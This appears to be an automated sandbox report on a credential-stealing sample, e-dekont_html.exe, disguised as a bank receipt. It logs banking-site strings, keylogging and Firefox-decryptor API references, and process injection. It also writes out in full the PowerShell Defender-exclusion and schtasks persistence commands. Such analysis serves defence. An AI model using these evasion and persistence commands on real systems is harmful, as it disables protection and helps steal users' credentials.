Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598639	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596465	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596324	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595780	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593954	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593829	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593704	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593579	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593454	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596858
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596750
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596641
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596531
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596079
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595954
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595579
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595454
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595329
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595204
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595079
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594709
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594580
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594454
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594329
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594204
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594079
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593954
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593829
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593704
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593579
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593339
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593219

Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: e-dekont_html.exe, 0000000A.00000002.3787902586.0000000001656000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIn1
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3787673676.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\e-dekont_html.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe

Code function: 10_2_06E59548 LdrInitializeThunk,LdrInitializeThunk,

10_2_06E59548

Source: C:\Users\user\Desktop\e-dekont_html.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory written: C:\Users\user\Desktop\e-dekont_html.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory written: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
